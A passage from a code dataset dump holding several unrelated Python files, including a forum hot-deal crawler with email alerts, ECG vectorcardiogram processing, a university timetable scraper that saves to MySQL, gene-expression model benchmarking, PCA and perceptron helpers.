\"SSH_CONFIG\" in all_elements.keys():\n self._ssh_config = LegacyConfigSchema._parseSSHConfig(all_elements[\"SSH_CONFIG\"])\n Logger.Log(f\"Found SSH_CONFIG legacy item in config file.\", logging.INFO)\n else:\n self._ssh_config = None\n# \n # _used = {\"DATA_DIR\", \"SSH_CONFIG\"}\n # _leftovers = { key : val for key,val in all_elements.items() if key not in _used }\n super().__init__(name=name, other_elements={})\n\n @property\n def DataDirectory(self) -> Optional[Path]:\n return self._data_dir\n\n @property\n def SSHConfig(self) -> Optional[SSHSchema]:\n return self._ssh_config\n\n @property\n def AsMarkdown(self) -> str:\n ret_val : str\n\n ret_val = f\"{self.Name}\"\n return ret_val\n\n @staticmethod\n def _parseDataDir(dir) -> Path:\n ret_val : Path\n if isinstance(dir, Path):\n ret_val = dir\n elif isinstance(dir, str):\n ret_val = Path(dir)\n else:\n ret_val = Path(str(dir))\n Logger.Log(f\"Config data dir was unexpected type {type(dir)}, defaulting to Path(str(dir))={ret_val}.\", logging.WARN)\n return ret_val\n\n @staticmethod\n def _parseSSHConfig(ssh) -> SSHSchema:\n ret_val : SSHSchema\n if isinstance(ssh, dict):\n ret_val = SSHSchema(name=\"SSH_CONFIG\", all_elements=ssh)\n else:\n ret_val = SSHSchema(name=\"SSH_CONFIG\", all_elements={})\n Logger.Log(f\"Config ssh config was unexpected type {type(ssh)}, defaulting to default ssh config: {ret_val.AsMarkdown}.\", logging.WARN)\n return ret_val","repo_name":"opengamedata/opengamedata-core","sub_path":"schemas/configs/LegacyConfigSchema.py","file_name":"LegacyConfigSchema.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"2332587221","text":"# -*- coding:utf-8 -*-\nimport datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport smtplib\nfrom email.mime.text import MIMEText\nimport sqlite3\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n\n\n#===========================================================================\ndef crawling(url,page,conn,cur):\n\n # requests로 페이지 가져오기\n text = requests.get(url+str(page)).text\n\n # bs로 파싱\n bs_obj = BeautifulSoup(text,'html.parser')\n\n # 핫딜 게시글 선택\n trs = bs_obj.select('#board_list > div > div.board_main.theme_default > table > tbody > tr')\n\n # 빈 메시지 생성\n message = ''\n\n\n # 핫딜 게시글 제목과 url을 빈 메시지에 추가\n for tr in reversed(trs[3:]):\n id = tr.find('td',{'class':'id'}).text.strip()\n id2 = cur.execute('SELECT board_id FROM Pages WHERE board_id =?',[id]).fetchone()\n\n if id2 == None:\n type = tr.find('td',{'class':'divsn'}).text.strip()\n name = tr.find('a',{'class':'deco'}).text.strip()\n author = tr.find('td',{'class':'writer'}).text.strip()\n recommend = tr.find('td',{'class':'recomd'}).text.strip()\n if recommend =='':\n recommend = 0\n view = tr.find('td',{'class':'hit'}).text.strip()\n url = tr.find('a',{'class':'deco'})['href']\n print(name)\n # DB에 데이터 입력\n cur.execute('INSERT OR IGNORE INTO Pages (board_id,type,subject,author,recommend,view,url) VALUES (?,?,?,?,?,?,?)',(id,type,name,author,recommend,view,url))\n # 변경내용 저장\n conn.commit()\n message = message+name+'\\n'+url+'\\n'+'\\n'\n else:\n if int(id) == id2[0]:\n continue\n else:\n type = tr.find('td',{'class':'divsn'}).text.strip()\n name = tr.find('a',{'class':'deco'}).text.strip()\n author = tr.find('td',{'class':'writer'}).text.strip()\n recommend = tr.find('td',{'class':'recomd'}).text.strip()\n if recommend =='':\n recommend = 0\n view = tr.find('td',{'class':'hit'}).text.strip()\n url = tr.find('a',{'class':'deco'})['href']\n print(name)\n # DB에 데이터 입력\n cur.execute('INSERT OR IGNORE INTO Pages (board_id,type,subject,author,recommend,view,url) VALUES (?,?,?,?,?,?,?)',(id,type,name,author,recommend,view,url))\n # 변경내용 저장\n conn.commit()\n message = message+name+'\\n'+url+'\\n'+'\\n'\n\n return message,id\n\n#===========================================================================\n\n# 핫딜 목록 메일 보내는 함수 정의\ndef send_mail(id,pw,to,mssg):\n # SMTP연결\n smtp = smtplib.SMTP('smtp.gmail.com', 587)\n smtp.ehlo() # extended hello SMTP확장 목록 요청\n smtp.starttls() # G메일은 tls인증을 사용하기 때문에 tls인증 함수 호출\n smtp.login(id, pw) # 메일계정 로그인\n\n # 메일 본문\n msg = MIMEText(mssg)\n # 메일 제목\n msg['Subject'] = '루리웹핫딜'\n # 수신자\n msg['To'] = to\n\n # 메일 보내기\n smtp.sendmail(id, to, msg.as_string())\n\n # 메일 전송 종료\n smtp.quit()\n\n#===========================================================================\ndef start_crawler():\n # 루리웹 핫딜게시판 주소\n url = 'http://bbs.ruliweb.com/market/board/1020?page='\n # 핫딜게 페이지 지정\n page = 1\n\n # db파일 생성\n conn = sqlite3.connect('hotdeal.sqlite')\n # 커서 생성\n cur = conn.cursor()\n # 테이블 생성\n cur.execute('''\n CREATE TABLE IF NOT EXISTS Pages (\n board_id INTEGER UNIQUE,\n type TEXT,\n subject TEXT,\n author TEXT,\n recommend INTEGER,\n view INTEGER,\n url TEXT\n )''')\n print(datetime.datetime.now())\n print('크롤링 시작')\n message,id = crawling(url,page,conn,cur)\n if message == '':\n print(message)\n print('새로운 핫딜이 없습니다.\\n')\n else:\n # 구글 아이디\n mail_id = '*******'\n # 구글 비밀번호\n mail_pw = '*******'\n # 수신자 메일 주소\n to_mail = '*******@naver.com'\n\n print('메일 전송')\n send_mail(mail_id,mail_pw,to_mail,message)\n print('전송 완료')\n\n\n# 1시간 간격으로 크롤러 실행\nsched = BlockingScheduler()\nsched.add_job(start_crawler,'interval', hours=1)\nsched.start()\n","repo_name":"valborgs/rurihotdeal","sub_path":"hotdeal_crawler.py","file_name":"hotdeal_crawler.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25825530062","text":"import array\nimport base64\n\nimport numpy as np\n\nimport xmltodict\n\n__author__ = \"Will Hewitt\"\n__credits__ = [\"Will Hewitt\"]\n__version__ = \"1.0.0\"\n__maintainer__ = \"Will Hewitt\"\n__email__ = \"william.hewitt@auckland.ac.nz\"\n__status__ = \"Development\"\n\nclass VCG:\n \"\"\" Class to compute VCG loops and calculate metrics \"\"\"\n \n # matrix to reconstruct Franks XYZ from 8L \n franks_x = np.matrix('-0.172; -0.074; 0.122; 0.231; 0.239; 0.194; 0.156; -0.010')\n franks_y = np.matrix('0.057; -0.019; -0.106; -0.022; 0.041; 0.048; -0.227; 0.887')\n franks_z = np.matrix('-0.229; -0.310; -0.246; -0.063; 0.055; 0.108; 0.022; 0.102')\n\n def __init__(self, ecg):\n\n self.ecg = ecg\n\n self.FranksX = np.zeros((ecg.lead_sample_count, 1))\n self.FranksY = np.zeros((ecg.lead_sample_count, 1))\n self.FranksZ = np.zeros((ecg.lead_sample_count, 1))\n\n self.__construct_franks()\n \n def mean_spatial_qrs_t(self):\n raise NotImplementedError\n \n def peak_spatial_qrs_t(self):\n raise NotImplementedError\n \n def __construct_franks(self):\n\n for i in range(0, self.ecg.lead_sample_count):\n\n sample = self.ecg.get_8L_sample(i)\n\n self.FranksX[i] = -1*(sample*self.franks_x)\n self.FranksY[i] = sample*self.franks_y\n self.FranksZ[i] = -1*(sample*self.franks_z)\n \n self.FranksX = np.squeeze(self.FranksX)\n self.FranksY = np.squeeze(self.FranksY)\n self.FranksZ = np.squeeze(self.FranksZ)\n\n\nclass ECG:\n \"\"\" Class that processes an XML file into an ECG object \"\"\" \n\n def __init__(self, path):\n\n try:\n with open(path, 'rb') as xml:\n self.__file = xmltodict.parse(xml.read().decode('utf8'))\n except Exception as e:\n raise e\n\n self.__lead_data = self.__file['RestingECG']['Waveform']['LeadData']\n self.lead_sample_count = int(self.__lead_data[0]['LeadSampleCountTotal'])\n\n self.LeadI = np.zeros((self.lead_sample_count, 1))\n self.LeadII = np.zeros((self.lead_sample_count, 1))\n self.LeadIII = np.zeros((self.lead_sample_count, 1))\n self.LeadAVR = np.zeros((self.lead_sample_count, 1))\n self.LeadAVL = np.zeros((self.lead_sample_count, 1))\n self.LeadAVF = np.zeros((self.lead_sample_count, 1))\n self.LeadV1 = np.zeros((self.lead_sample_count, 1))\n self.LeadV2 = np.zeros((self.lead_sample_count, 1))\n self.LeadV3 = np.zeros((self.lead_sample_count, 1))\n self.LeadV4 = np.zeros((self.lead_sample_count, 1))\n self.LeadV5 = np.zeros((self.lead_sample_count, 1))\n self.LeadV6 = np.zeros((self.lead_sample_count, 1))\n\n self.__unpack()\n\n def get_8L_sample(self, i):\n\n return np.array([ self.LeadV1[i], self.LeadV2[i], self.LeadV3[i], self.LeadV4[i], self.LeadV5[i], self.LeadV6[i], self.LeadI[i], self.LeadII[i] ])\n\n def __unpack(self):\n\n for lead in self.__lead_data:\n\n lead_id = lead['LeadID']\n lead_data = lead['WaveFormData']\n lead_b64 = base64.b64decode(lead_data)\n lead_vals = np.array(array.array('h', lead_b64))\n\n if lead_id == 'I':\n self.LeadI = lead_vals\n elif lead_id == 'II':\n self.LeadII = lead_vals\n elif lead_id == 'V1':\n self.LeadV2 = lead_vals\n elif lead_id == 'V2':\n self.LeadV2 = lead_vals\n elif lead_id == 'V3':\n self.LeadV3 = lead_vals\n elif lead_id == 'V4':\n self.LeadV4 = lead_vals\n elif lead_id == 'V5':\n self.LeadV5 = lead_vals\n elif lead_id == 'V6':\n self.LeadV6 = lead_vals\n\n self.LeadIII = np.subtract(self.LeadII, self.LeadI)\n self.LeadAVR = np.add(self.LeadI, self.LeadII)*(-0.5)\n self.LeadAVL = np.subtract(self.LeadI, 0.5*self.LeadII)\n self.LeadAVF = np.subtract(self.LeadII, 0.5*self.LeadI)\n","repo_name":"hewittwill/PyVCG","sub_path":"PyVCG.py","file_name":"PyVCG.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33680569642","text":"class Simulation(object):\n def __init__(self, env, agent):\n self.env = env\n self.agent = agent\n \n #logging\n self.rewards = []\n def play(self, num_episodes, render):\n for i in range(num_episodes):\n state = self.env.reset()\n done = False\n total_reward = 0\n while not done:\n if render:\n self.env.render()\n action = self.agent.select_action(state)\n state, reward, done, info = self.env.step(action)\n total_reward+=reward\n self.rewards.append(total_reward)","repo_name":"alexandrumilu/rl","sub_path":"Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21315411500","text":"\nMAX_TRIES = 10\n\ndef delete(server, dbname):\n \"\"\"\n Deletes a database, trying many times before failing. This is because\n couch doesn't like deleting databases in windows.\n \"\"\"\n tries = 0\n e = \"UNKNOWN REASON\"\n while tries < MAX_TRIES:\n try: \n server.delete_db(dbname)\n return\n except Exception as e: \n # logging.error(\"Can't delete database %s. %s\" % (dbname, e))\n tries += 1\n if tries == MAX_TRIES:\n raise Exception(\"Unable to delete %s after %s tries. Because: %s\" % \\\n (dbname, MAX_TRIES, e))","repo_name":"dimagi/dimagi-utils","sub_path":"dimagi/utils/couch/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"28042098300","text":"# Imports\nimport sys\nimport os\nimport argparse\nimport inspect\nfrom datetime import datetime\nimport numpy as np\n\nimport torch\nimport scipy\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom scipy.integrate import odeint, solve_ivp\n\n#from datagenerator import DataGenerator\nfrom datahandler import DataHandler\nfrom odenet import ODENet\nfrom read_config import read_arguments_from_file\nfrom visualization_inte import *\nfrom helper_true_velo import *\n\n\n\ndef _build_save_file_name(save_path, epochs):\n return 'scDVF_{}-{}-{}({};{})_{}_{}epochs'.format(str(datetime.now().year), str(datetime.now().month),\n str(datetime.now().day), str(datetime.now().hour), str(datetime.now().minute), save_path, epochs)\n\ndef save_model(odenet, folder, filename):\n odenet.save('{}{}.pt'.format(folder, filename))\n\nparser = argparse.ArgumentParser('Testing')\nparser.add_argument('--settings', type=str, default='config_inte.cfg')\nclean_name = \"chalmers_690genes_150samples_earlyT_0bimod_1initvar\" \nclean_name_velo = \"chalmers_690genes_150samples_earlyT_0bimod_1initvar_DERIVATIVES\" \nparser.add_argument('--data', type=str, default='/home/ubuntu/neural_ODE/ground_truth_simulator/clean_data/{}.csv'.format(clean_name))\nparser.add_argument('--velo_data', type=str, default='/home/ubuntu/neural_ODE/ground_truth_simulator/clean_data/{}.csv'.format(clean_name_velo))\n\n\nargs = parser.parse_args()\n\n# Main function\nif __name__ == \"__main__\":\n print('Setting recursion limit to 3000')\n sys.setrecursionlimit(3000)\n print('Loading settings from file {}'.format(args.settings))\n settings = read_arguments_from_file(args.settings)\n cleaned_file_name = clean_name\n save_file_name = _build_save_file_name(cleaned_file_name, settings['epochs'])\n\n if settings['debug']:\n print(\"********************IN DEBUG MODE!********************\")\n save_file_name= '(DEBUG)' + save_file_name\n output_root_dir = '{}/{}/'.format(settings['output_dir'], save_file_name)\n\n img_save_dir = '{}img/'.format(output_root_dir)\n interm_models_save_dir = '{}interm_models/'.format(output_root_dir)\n #intermediate_models_dir = '{}intermediate_models/'.format(output_root_dir)\n\n # Create image and model save directory\n if not os.path.exists(output_root_dir):\n os.makedirs(output_root_dir, exist_ok=True)\n if not os.path.exists(img_save_dir):\n os.mkdir(img_save_dir)\n if not os.path.exists(interm_models_save_dir):\n os.mkdir(interm_models_save_dir)\n\n # Save the settings for future reference\n with open('{}/settings.csv'.format(output_root_dir), 'w') as f:\n f.write(\"Setting,Value\\n\")\n for key in settings.keys():\n f.write(\"{},{}\\n\".format(key,settings[key]))\n\n # Use GPU if available\n if not settings['cpu']:\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n print(\"Trying to run on GPU -- cuda available: \" + str(torch.cuda.is_available()))\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(\"Running on\", device)\n #device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n else:\n print(\"Running on CPU\")\n device = 'cpu'\n \n data_handler = DataHandler.fromcsv(args.data, device, settings['val_split'], normalize=settings['normalize_data'], \n batch_type=settings['batch_type'], batch_time=settings['batch_time'], \n batch_time_frac=settings['batch_time_frac'],\n noise = 0,\n img_save_dir = img_save_dir,\n scale_expression = settings['scale_expression'],\n log_scale = settings['log_scale'],\n init_bias_y = settings['init_bias_y'])\n \n data_handler_velo = DataHandler.fromcsv(args.velo_data, device, settings['val_split'], normalize=settings['normalize_data'], \n batch_type=settings['batch_type'], batch_time=settings['batch_time'], \n batch_time_frac=settings['batch_time_frac'],\n noise = 0,\n img_save_dir = img_save_dir,\n scale_expression = settings['scale_expression'],\n log_scale = settings['log_scale'],\n init_bias_y = settings['init_bias_y'])\n\n # Initialization\n odenet = ODENet(device, data_handler.dim, explicit_time=settings['explicit_time'], neurons = settings['neurons_per_layer'], \n log_scale = settings['log_scale'], init_bias_y = settings['init_bias_y'])\n odenet.float()\n param_count = sum(p.numel() for p in odenet.parameters() if p.requires_grad)\n param_ratio = round(param_count/ (data_handler.dim)**2, 3)\n print(\"Using a NN with {} neurons per layer, with {} trainable parameters, i.e. parametrization ratio = {}\".format(settings['neurons_per_layer'], param_count, param_ratio))\n \n pretrained_model_file = '/home/ubuntu/neural_ODE/ode_net/code/output/_pretrained_best_model/best_val_model.pt'\n odenet.load(pretrained_model_file)\n \n with open('{}/network.txt'.format(output_root_dir), 'w') as net_file:\n net_file.write(odenet.__str__())\n net_file.write('\\n\\n\\n')\n net_file.write(inspect.getsource(ODENet.forward))\n net_file.write('\\n')\n\n #quit()\n\n # Init plot\n if settings['viz']:\n visualizer = Visualizator1D(data_handler, odenet, settings)\n\n if settings['viz']:\n with torch.no_grad():\n visualizer.visualize()\n visualizer.plot()\n visualizer.save(img_save_dir, 0)\n \n \n #DYNAMO vector field RKHS regression\n for train_noise_level in [0 ,0.025, 0.05, 0.1]:\n dynamo_vf_inputs = get_true_val_velocities(odenet, data_handler, data_handler_velo, settings['method'], settings['batch_type'], noise_for_training= train_noise_level)\n \n X_train = dynamo_vf_inputs['x_train']\n X_val = dynamo_vf_inputs['x_val']\n X_val_target = dynamo_vf_inputs['x_target_val']\n X_full = dynamo_vf_inputs['x_full']\n Y_train = dynamo_vf_inputs['true_velo_x_train']\n Y_val = dynamo_vf_inputs['true_velo_x_val']\n Y_full = dynamo_vf_inputs['true_velo_x_full']\n t_val = dynamo_vf_inputs['t_val']\n phx_val_set_pred = dynamo_vf_inputs['phx_val_set_pred']\n \n\n print(\"..................................\")\n print(\"PHX val corr vs true velos (w/o access!):\", \n round(np.corrcoef(Y_val.flatten(), phx_val_set_pred.flatten())[0,1], 4))\n #print(\"PHX val MSE vs true velos (w/o access!): {:.3E}\".format(np.mean((Y_val.flatten() - phx_val_set_pred.flatten())**2)))\n \n \n print(\"creating scDVF VAE model..\")\n input_dim = keras.Input(shape=(X_train.shape[1],))\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(input_dim)\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n encoded = keras.layers.Dense(16, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n\n decoded = keras.layers.Dense(16, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n decoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(64, activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(Y_train.shape[1])(decoded)\n\n encoder = keras.Model(input_dim, encoded)\n autoencoder = keras.Model(input_dim, decoded)\n\n opt = keras.optimizers.Adam(learning_rate=0.00005)\n autoencoder.compile(optimizer=opt, loss='mse')\n #autoencoder.summary()\n print(\"done creating model, fitting now..\")\n \n es = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)\n autoencoder.fit(X_train, Y_train,\n epochs=100,\n batch_size=2,\n shuffle=True,\n validation_data=(X_val, Y_val),\n callbacks=[es], \n verbose = 0)\n\n pred_val = autoencoder.predict(X_val, verbose = 0).flatten() \n corr_coeff_val = round(np.corrcoef(Y_val.flatten(), \n pred_val)[0,1], 4)\n pred_train = autoencoder.predict(X_train, verbose = 0).flatten() \n corr_coeff_train = round(np.corrcoef(Y_train.flatten(), \n pred_train)[0,1], 4)\n print(\"\")\n print(\"train corr:\", corr_coeff_train, \", val_corr:\", corr_coeff_val)\n print(\"..................................\")\n print(\"Now doing trajectory work...\")\n\n \n velo_fun_x = lambda t,x : np.squeeze(autoencoder.predict(np.expand_dims(x, axis = 0), \n verbose = 0))\n\n pred_next_pts = pred_traj_given_ode(my_ode_func = velo_fun_x, \n X_val = X_val, \n t_val = t_val)\n\n mse_val_traj = np.mean((X_val_target - pred_next_pts)**2)\n print(\"MSE val traj = {:.3E}\".format(mse_val_traj)) \n print(\"..................................\")\n \n # print(\"obtaining GRN now..\\n\")\n\n # def reverse_raw_ae(t, in_x):\n # input_x = tf.convert_to_tensor(np.expand_dims(in_x, axis=0))\n # dx = autoencoder.predict(input_x, verbose = 0).flatten() \n # return dx \n\n\n # def short_reverse_interpolate(y0, X_full, neigh, pca, umap_reducer, steps, intermediate_steps, noise_sd):\n # solution = []\n # for step in range(steps):\n # # Interpolate using autoencoder\n # t_eval = list(range(intermediate_steps))\n # noise = np.random.normal(0, noise_sd)\n # sol = solve_ivp(reverse_raw_ae, [min(t_eval), max(t_eval)], y0+noise, method=\"RK23\", t_eval=t_eval)\n # y = sol.y.T\n \n # # Lower dimensionality\n # ending_pt_pca = pca.transform(np.nan_to_num(np.log1p(y)))\n \n # # Find knn reference points\n # interp_neigh = neigh.kneighbors(ending_pt_pca)\n \n # # New reference point\n # y0 = np.median(X_full[interp_neigh[1][-1, :], :], axis=0)\n # solution.append(y0)\n \n # return np.array(solution)\n\n\n # # PCA the count data\n # pca = sklearn.decomposition.PCA(n_components=30)\n # adata_pca = pca.fit_transform(np.log1p(X_full))\n # # Further reduce the dim with UMAP\n # umap_reducer = umap.UMAP(random_state=42)\n # adata_umap = umap_reducer.fit_transform(adata_pca)\n # # Construct KNN with PCA\n # neigh = sklearn.neighbors.NearestNeighbors(n_neighbors=30)\n # neigh.fit(adata_pca)\n\n # n_cells = 200\n # num_steps = 15\n # cell_path = np.zeros((n_cells, num_steps, X_full.shape[1]))\n # for i in range(n_cells):\n # print(i)\n # y0 = np.random.rand(X_full.shape[1])\n # y0_noise = 0\n # # Solve for the cell with initial & velocity noise\n # y_solution = short_reverse_interpolate(y0+y0_noise, X_full = X_full, \n # neigh = neigh, pca = pca,\n # umap_reducer = umap_reducer, \n # steps = num_steps,\n # intermediate_steps = 5, \n # noise_sd = 0)\n # cell_path[i] = y_solution\n \n \n # cell_path = pd.DataFrame(data=cell_path[:,2,:])\n # corr = cell_path.corr(method='pearson').fillna(0)\n # corr = corr.loc[:, (corr != 0).any(axis=0)]\n # corr = corr.loc[(corr != 0).any(axis=1), :]\n # np.savetxt(\"/home/ubuntu/neural_ODE/ode_net/code/model_inspect/effects_mat_{}.csv\".format(noise_level), corr, delimiter=\",\")\n\n \n \n \n","repo_name":"QuackenbushLab/phoenix","sub_path":"benchmarked_methods/code/scDVF_extract_matrix.py","file_name":"scDVF_extract_matrix.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"85"} +{"seq_id":"27042967573","text":"\nfrom numpy.linalg import eigh\n\nfrom fastats.scaling import demean\n\n\ndef pca(data, components=4):\n \"\"\"\n Principal Component Analysis, returning\n the transformed data.\n\n This does not scale the data.\n\n Examples\n --------\n\n >>> x = np.array([\n ... [1, 2, 3],\n ... [4, 5, 6],\n ... [7, 8, 9]\n ... ])\n >>> np.abs(pca(x, components=1))\n array([[5.19615242],\n [0. ],\n [5.19615242]])\n \"\"\"\n demeaned_data = demean(data)\n cov = demeaned_data.T @ demeaned_data\n # eigh returns ordered eigenvalues\n _, V = eigh(cov)\n\n V = V.T[::-1].T[:, :components]\n\n trans = (V.T @ demeaned_data.T).T\n return trans\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","repo_name":"fastats/fastats","sub_path":"fastats/linear_algebra/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"85"} +{"seq_id":"15126980587","text":"# coding:utf-8\nimport codecs\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup\nimport pymysql\nimport re\nimport sys\n\n\nclass XDspiderKeBiao:\n def __init__(self, auth_url=None, log_url=None):\n if not auth_url:\n # 登录界面 post\n self.auth_url = \"http://ids.xidian.edu.cn/authserver/login?service=http%3A%2F%2Fjwxt.xidian.edu.cn%2Fcaslogin.jsp\"\n self.log_url = \"http://jwxt.xidian.edu.cn/caslogin.jsp\"\n else:\n self.auth_url = auth_url\n self.log_url = log_url\n self.session = requests.Session()\n\n def login(self, id='', password=''):\n r = self.session.get(self.auth_url)\n data = r.text\n bsObj = BeautifulSoup(data, \"html.parser\")\n # 登录所需信息\n lt_value = bsObj.find(attrs={\"name\": \"lt\"})['value']\n exe_value = bsObj.find(attrs={\"name\": \"execution\"})['value']\n params = {'username': id, 'password': password,\n \"submit\": \"\", \"lt\": lt_value, \"execution\": exe_value,\n \"_eventId\": \"submit\", \"rmShown\": '1'}\n # 模拟登录报头\n headers = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\",\n 'Accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Referer\": \"http://ids.xidian.edu.cn/authserver/login?service=http%3A%2F%2Fjwxt.xidian.edu.cn%2Fcaslogin.jsp\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"}\n s = self.session.post(self.auth_url, data=params, headers=headers)\n s = self.session.get(self.log_url)\n # 将爬取的数据存为CSV文件\n\n def Store(self):\n grade_page = self.session.get(\n \"http://yjsxt.xidian.edu.cn/eduadmin/findCaresultByStudentAction.do\")\n\n bsObj = BeautifulSoup(grade_page.text, \"html.parser\")\n bsObj.encode('utf-8')\n table = bsObj.findAll(\"table\", {\"class\": \"arranging_arrange\"})[0]\n rows = table.findAll(\"tr\")\n\n csvFile = file('./kebiao.csv', 'wb',)\n csvFile.write(codecs.BOM_UTF8)\n writer = csv.writer(csvFile)\n\n writer.writerow(('week', 'one', 'two', 'three', 'four', 'five', 'six', 'seven'))\n csvRow = []\n\n try:\n for row in rows:\n csvRow = []\n for cell in row.findAll('td'):\n csvRow.append(cell.get_text().strip().encode('utf-8'))\n writer.writerow(csvRow)\n finally:\n csvFile.close()\n\n # 将CSV文件存入MySQL\n def saveMysql(self):\n csvFile1 = codecs.open('./kebiao.csv', 'r')\n reader = csv.DictReader(csvFile1)\n\n csvFile = file('./kebiao2.csv', 'wb')\n writer1 = csv.writer(csvFile)\n csvFile.write(codecs.BOM_UTF8)\n writer1.writerow(('one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight','nine'))\n a = []\n b = []\n c = []\n d = []\n g = []\n for e in reader:\n a.append(e['one'])\n b.append(e['two'])\n c.append(e['three'])\n d.append(e['four'])\n g.append(e['five'])\n writer1.writerow(a)\n writer1.writerow(b)\n writer1.writerow(c)\n writer1.writerow(d)\n writer1.writerow(g)\n #print(a)\n #print(b)\n def reader(self,stu_id):\n\n csvFile2 = codecs.open('./kebiao2.csv', 'r',)\n reader1 = csv.DictReader(csvFile2)\n i = 1\n #print(reader1)\n for e in reader1:\n\n\n\n\n\n # 连接到数据库\n\n connection = pymysql.connect(host='127.0.0.1', user='root', password='root', db='xidian', charset='utf8',\n cursorclass=pymysql.cursors.DictCursor)\n # 执行sql语句\n # strip() 去除空格\n try:\n with connection.cursor() as cursor:\n sql = \"insert into `course`(`stu_id`,`weekday`,`one`,`three`,`five`,`seven`,`nine`)values(%s,%s,%s,%s,%s,%s,%s)\"\n # # 使用 execute() 方法执行 SQL 查询\n\n cursor.execute(sql, (\n stu_id,i, e['\\xef\\xbb\\xbfone'], e['three'], e['five'], e['seven'], e['nine'],))\n\n connection.commit()\n\n finally:\n\n connection.close()\n i = i + 1\n#Java调用时传递的参数格式[sno,password,stu_id]\nif __name__ == '__main__':\n #设置编码格式\n reload(sys)\n sys.setdefaultencoding('utf-8')\n # 初始化爬虫对象\n XD = XDspiderKeBiao()\n # 登录(在此处传入正确的个人学号与密码信息)\n XD.login(sys.argv[0],sys.argv[1])\n XD.Store()\n XD.saveMysql()\n XD.reader(sys.argv[2])\n","repo_name":"joeyos/Spider","sub_path":"code/XDSpider_Python27Tojava/XIDIAN/kebiao.py","file_name":"kebiao.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73045026198","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\n'''\n The following helpers: plot_points and display has been taken as a reference from: \n https://github.com/udacity/deep-learning-v2-pytorch/blob/master/intro-neural-networks/gradient-descent/GradientDescent.ipynb\n'''\n\ndef plot_points(X, y):\n '''\n plot_points will generate an scatter plot where students has been rejected or accepted\n\n parameters: \n -----------\n X: int, representative of the coordinates of the points to plot \n Y: int, label that indicates if a student has been accepted (1) and rejected(0)\n\n '''\n admitted = X[np.argwhere(y==1)]\n rejected = X[np.argwhere(y==0)]\n plt.scatter([coords[0][0] for coords in rejected], [coords[0][1] for coords in rejected], s = 25, color = 'green', edgecolor = 'k')\n plt.scatter([coords[0][0] for coords in admitted], [coords[0][1] for coords in admitted], s = 25, color = 'red', edgecolor = 'k')\n\ndef display(m, b, color='gray', linestyle='--'):\n '''\n display will generate the plot scales for the X and y axis and will draw the line\n\n parameters: \n ----------\n m: float, slope of the line \n b: float, intercept of the line \n '''\n plt.xlim(-0.05,1.05) # set the x limit \n plt.ylim(-0.05,1.05) # set the y limit \n x = np.arange(-10, 10, 0.1)\n plt.plot(x, m*x+b, color=color, linestyle=linestyle)\n\n\n\ndef stepFunction(t):\n '''\n stepFunction will fire (1) if the linear equation result is greater than 0, otherwise returns 0 \n\n parameters\n ----------\n t: int, predicted value\n\n returns: int with the neuron being fired or not\n '''\n if t >= 0:\n return 1\n return 0\n\ndef prediction(X, W, b):\n '''\n prediction will execute the matrix multiplication Wx + b \n\n parameters\n ----------\n X: numpy 1D array, input elements to perform the equations. Also called features\n W: numpy 1D array, weights for each element in X. \n b: int, bias unit \n\n returns: int representing the prediction after passing through the Step function\n '''\n linearCombination = np.matmul(X,W)+b\n return stepFunction(linearCombination[0])\n\n# The function should receive as inputs the data X, the labels y,\n# the weights W (as an array), and the bias b,\n# update the weights and bias W, b, according to the perceptron algorithm,\n# and return W and b.\ndef perceptronStep(X, y, W, b, learn_rate = 0.01):\n '''\n will apply the perceptron step based on the prediction\n\n parameters\n ----------\n X: numpy 1D array, input elements to perform the equations. Also called features\n y: numpy 1D array, labels to match the expected output from the prediction\n W: numpy 